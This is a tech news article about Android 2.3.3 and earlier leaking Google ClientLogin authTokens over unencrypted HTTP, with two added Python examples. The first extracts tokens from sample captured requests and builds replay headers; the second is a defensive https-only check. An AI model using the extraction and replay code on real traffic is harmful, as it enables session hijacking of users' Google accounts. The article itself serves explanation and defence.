
Nearly all Android phones ‘leak’ sensitive personal data, tests show

Google’s privacy woes just got worse. According to a study by researchers at a German university, more than 99 percent of smartphones running Google‘s Android operating system, every device on version 2.3.3 or earlier, hand an attacker on the same network a token that lets them impersonate the phone’s owner. With that token the attacker can read and modify the user’s data in Google services such as Calendar and Contacts.

According to University of Ulm researchers Bastian Könings, Jens Nickels and Florian Schaub, the flaw lies in how Android 2.3.3 and earlier use Google’s ClientLogin protocol, The Register reports. After the user signs in with a username and password, the phone obtains an authentication token (authToken) and then presents that token with every sync request, but it does so over plain, unencrypted HTTP. Because the same authToken remains valid for up to 14 days, anyone who can watch the phone’s traffic can copy the token and replay it to Google’s servers as if they were the user.


“We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis,” write the researchers on their blog. “The short answer is: Yes, it is possible, and it is quite easy to do so. Further, the attack is not limited to Google Calendar and Contacts, but is theoretically feasible with all Google services using the ClientLogin authentication protocol for access to its data APIs.”

As bad as this sounds, and is, for Android users, the attack has a precondition: the attacker must be able to observe the phone’s unencrypted traffic. In practice that means the phone is sending data over an unsecured network such as an open Wi-Fi hotspot, or over a network the attacker controls.

“To collect such authTokens on a large scale an adversary could set up a wifi access point with a common SSID (evil twin) of an unencrypted wireless network, e.g., T-Mobile, attwifi, starbucks,” write the researchers. “With default settings, Android phones automatically connect to a previously known network and many apps will attempt syncing immediately. While syncing would fail (unless the adversary forwards the requests), the adversary would capture authTokens for each service that attempted syncing.”
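To make the capture step concrete, here is an added example, written for this article and not the Ulm researchers’ tooling, of what the evil-twin access point has to do once it sees the phone’s sync traffic: pick the ClientLogin authToken out of each plaintext HTTP request and label it by the service it unlocks. The captured requests are constructed for the example (the token strings are placeholders, not real Google tokens), and the path-to-service mapping covers only the Calendar and Contacts APIs the researchers named.

```python
import re
from typing import Dict, List

# Constructed sample of what an evil-twin access point would see from a phone
# that syncs over plain HTTP: the authToken rides in an Authorization header.
# Token strings are fake placeholders, not real Google tokens.
CAPTURED_REQUESTS: List[str] = [
    "GET /calendar/feeds/default/allcalendars/full HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Authorization: GoogleLogin auth=DQAAAK4AAAD_constructed_calendar_token\r\n"
    "User-Agent: Android-GData/1.4\r\n"
    "\r\n",
    "GET /m8/feeds/contacts/default/full HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Authorization: GoogleLogin auth=DQAAAK4AAAD_constructed_contacts_token\r\n"
    "\r\n",
    # A request without a ClientLogin header gives the attacker nothing to replay.
    "GET /humans.txt HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "\r\n",
]

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d", re.M)
HOST_HEADER = re.compile(r"^Host:[ \t]*(\S+)", re.I | re.M)
CLIENTLOGIN_HEADER = re.compile(
    r"^Authorization:[ \t]*GoogleLogin[ \t]+auth=(\S+)", re.I | re.M
)

# Google Data API path prefixes for the two services the researchers named.
SERVICE_PREFIXES = {"/calendar/": "calendar", "/m8/": "contacts"}


def service_for(path: str) -> str:
    """Label a captured token by the service its request path belongs to."""
    for prefix, name in SERVICE_PREFIXES.items():
        if path.startswith(prefix):
            return name
    return "other"


def extract_tokens(requests: List[str]) -> List[Dict[str, str]]:
    """Return one record per captured request that carries a ClientLogin authToken."""
    found = []
    for raw in requests:
        auth = CLIENTLOGIN_HEADER.search(raw)
        if auth is None:
            continue  # no token in this request; nothing to replay
        req = REQUEST_LINE.search(raw)
        host = HOST_HEADER.search(raw)
        path = req.group(2) if req else "?"
        found.append({
            "host": host.group(1) if host else "?",
            "path": path,
            "service": service_for(path),
            "token": auth.group(1),
        })
    return found


def replay_headers(record: Dict[str, str]) -> Dict[str, str]:
    """Headers an attacker would attach to reuse the captured token. Nothing
    else is needed, which is why a cleartext token is so dangerous."""
    return {
        "Host": record["host"],
        "Authorization": f"GoogleLogin auth={record['token']}",
    }


if __name__ == "__main__":
    for rec in extract_tokens(CAPTURED_REQUESTS):
        print(rec["service"], rec["host"], rec["token"][:12] + "...")
```

Note that the sync request itself never has to succeed: the token is in the very first request the phone sends, so an access point that simply drops the connection still gets it.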

The researchers suggest fixes for app developers, for Google and for Android users. Developers whose apps use ClientLogin “should immediately switch to https,” the researchers say, so that the token travels inside an encrypted connection. Google should shorten the lifetime of the authToken and make Android connect automatically only to protected (encrypted) networks. Android users should update their devices to version 2.3.4 as soon as possible, turn off automatic sync when connecting over Wi-Fi, or avoid unsecured Wi-Fi networks entirely.
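The developer-side fix is simple to state and easy to get wrong silently, so here is an added example, not Google’s or the researchers’ code, of how an app should treat a ClientLogin authToken: refuse to attach it to any URL that is not https, and rewrite the legacy http sync URL before use. The helper names and the sample Calendar URL are assumptions for the illustration; the example builds the request but does not send it.

```python
from urllib.parse import urlsplit, urlunsplit


class InsecureTransport(Exception):
    """Raised when a ClientLogin authToken would leave the device unencrypted."""


def is_safe_to_send(url: str) -> bool:
    """Only https may carry the token; over http anyone on the path can read it."""
    return urlsplit(url).scheme == "https"


def upgrade_to_https(url: str) -> str:
    """The fix the researchers recommend: move ClientLogin traffic from http://
    to https:// so the authToken is sent inside TLS."""
    parts = urlsplit(url)
    if parts.scheme == "http":
        parts = parts._replace(scheme="https")
    return urlunsplit(parts)


def authorized_request(url: str, auth_token: str) -> dict:
    """Build the request an app would send to a Google Data API (hypothetical
    helper, not an Android API). Fails loudly instead of leaking the token,
    which is the behaviour Android 2.3.3 and earlier lacked."""
    if not is_safe_to_send(url):
        scheme = urlsplit(url).scheme or "unknown"
        raise InsecureTransport(f"refusing to send authToken over {scheme}: {url}")
    return {
        "method": "GET",
        "url": url,
        "headers": {"Authorization": f"GoogleLogin auth={auth_token}"},
    }


# Constructed input: the kind of plaintext URL the old Calendar sync used.
LEGACY_SYNC_URL = "http://www.google.com/calendar/feeds/default/allcalendars/full"

if __name__ == "__main__":
    token = "DQAAAK4AAAD_constructed_token"  # placeholder, not a real token
    try:
        authorized_request(LEGACY_SYNC_URL, token)
    except InsecureTransport as exc:
        print("blocked:", exc)
    fixed = authorized_request(upgrade_to_https(LEGACY_SYNC_URL), token)
    print("sent:", fixed["url"])
```

The check belongs at the point where the Authorization header is added, not in a config file that a later URL change can bypass; a token that is never attached to an http request cannot be sniffed, whatever network the phone joins.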

Andrew Couts
Former Digital Trends Contributor
Features Editor for Digital Trends, Andrew Couts covers a wide swath of consumer technology topics, with particular focus on…